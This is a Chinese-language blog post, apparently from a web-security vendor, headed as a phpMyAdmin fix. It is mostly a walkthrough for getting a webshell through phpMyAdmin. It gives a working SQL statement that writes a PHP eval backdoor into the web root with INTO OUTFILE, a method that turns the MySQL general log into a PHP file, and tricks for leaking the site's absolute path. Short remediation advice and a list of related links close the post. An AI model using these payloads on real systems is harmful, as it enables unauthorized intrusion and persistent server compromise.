修復網站漏洞對phpmyadmin防止被入侵提權的解決辦法
phpmyadmin是很多網站用來管理資料庫的一個系統,尤其是mysql資料庫管理的較多一些,最近phpmysql爆出漏洞,尤其是弱口令,sql注入漏洞,都會導致mysql的資料賬號密碼被洩露,那麼如何通過phpmyadmin來上傳提權webshell呢
首先我們來搭建一下PHP+mysql環境,linux centos系統,PHP的版本是5.3,mysql版本是5.6,linux系統64位,apache 2.2版本,部署在新開的一臺阿里雲的按量付費ECS伺服器。
phpmyadmin漏洞利用
利用mysql資料庫select into outfile方式來寫入webshell到網站的根目錄下,該漏洞的利用前提是必須知道網站的當前路徑是多少,如何知道網站的當前路徑,這個要通過爆出網站的錯誤來進行檢視絕對的路徑。使用下面的程式碼:
select load_file(`/home/www/safe.php`)
select `<?php eval($_POST[sine]); ?>` into outfile `/home/www/safe.php`;
執行這個語句就可以生成一句話的木馬後門。
也可以使用寫資料庫日誌的方式來進行漏洞的利用,前提是mysql的版本都是5.0以上的,以及日誌開啟,如果沒有開啟日誌功能,我們需要在phpmyadmin裡進行開啟,語句如下:set globalgener al_log = “ON”;這個資料庫語句就是開啟日誌的功能。檢視當前資料庫是否開啟,可以使用語句檢視到SHOW VARIABLES LIKE `general%`就可以看到是否開啟日誌了,日誌開啟成功,那麼我們把日誌的檔案改為php,這樣就可以記錄日誌到php檔案當中去了,我們在操作語句的時候可以把一句話網站後門程式碼寫到日誌檔案當中去進行執行。
關於phpmyadmin網站的絕對路徑獲取,可以使用單引號來進行錯誤測試,在ID值後門加上單引號,有些網站就會爆出絕對的網站路徑,再一個使用錯誤的賦值比如ID=1是正常,那麼我們可以使用ID=-1,來進行報錯,也可以使用搜尋引擎來檢視網站的快照,看看是否存在一些錯誤的快照收錄,很多網站會留下一些測試的程式碼,比如phpinfo這樣的程式碼,檔案地址是text.php 1.php phpinfo.php等待的檔案。
以上就是phpmyadmin漏洞利用,以及如何提權拿webshell的一些利用技巧,關於phpmyadmin漏洞的修復,SINE安全建議管理員關閉掉phpmyadmin的對外訪問,只允許在伺服器裡開啟phpmyadmin的介面,外網無法開啟。對網站的根目錄部署防篡改安全防護,禁止新增PHP檔案。
相關文章
- 網站漏洞修復對phpmyadmin防止被入侵提權的解決辦法網站PHP
- apache網站漏洞修復解決辦法Apache網站
- 防止網站被入侵攻擊的五個辦法網站
- 網站漏洞修復公司處理網站被篡改跳轉到其他網站的解決辦法網站
- 如何防止網站被侵入,如何防止網站被掛馬,如何防止網站被入侵?網站
- 網站被入侵 篡改程式碼劫持快照的解決辦法網站
- 網站被攻擊 如何修復網站漏洞網站
- WordPress網站漏洞利用及漏洞修復解決方案網站
- 網站存在漏洞被駭客入侵了怎麼解決網站
- 對泛微OA系統的網站安全檢測以及漏洞修復辦法網站
- Kindeditor 漏洞導致網站被植入木馬檔案的解決辦法網站
- 網站漏洞修復SQL隱碼攻擊防護辦法網站SQL
- PrestaShop網站漏洞修復如何修復REST網站
- 網站漏洞檢測對漏洞檢測修復方案網站
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- 網站漏洞修復服務商關於越權漏洞分析網站
- 放假期間網站被掛馬的解決辦法網站
- 怎麼修復網站漏洞騎士cms的漏洞修復方案網站
- 公司網站被攻擊怎麼辦? 五種解決辦法幫您網站恢復正常訪問網站
- 網站漏洞修復 上傳webshell漏洞修補網站Webshell
- 如何對網站登入進行漏洞測試以及漏洞修復網站
- 網站存在漏洞怎麼修復 如何修補網站程式程式碼漏洞網站
- thinkcmf 網站最新漏洞修復方法網站
- PayPal提現被退回的解決辦法?(教程和費用)
- 網站漏洞修復服務商對繞過認證漏洞的探討網站
- 如何尋找網站安全公司來解決網站安全被入侵問題網站
- Linux 髒管道kernel提權漏洞復現及修復(CVE-2022-0847)Linux
- 網站被黑該怎麼修復漏洞網站
- 框架網站漏洞修復防護方法框架網站
- 網站title標題被改並被百度網址安全中心提醒的解決辦法網站
- 網站漏洞修復之Metinfo 檔案上傳漏洞網站
- struts2架構網站漏洞修復詳情與利用漏洞修復方案架構網站
- linux sudo漏洞修復辦法 可防禦黑客的攻擊Linux黑客
- 網站漏洞修復之圖片驗證碼的詳細修復方案網站
- 網站漏洞處理修復服務之lankecms篡改漏洞網站
- phpmyadmin在PHP7中顯示空白的解決辦法!PHP
- 網站存在漏洞被通知整改怎麼辦網站
- 怎麼防止網站不被攻擊和入侵網站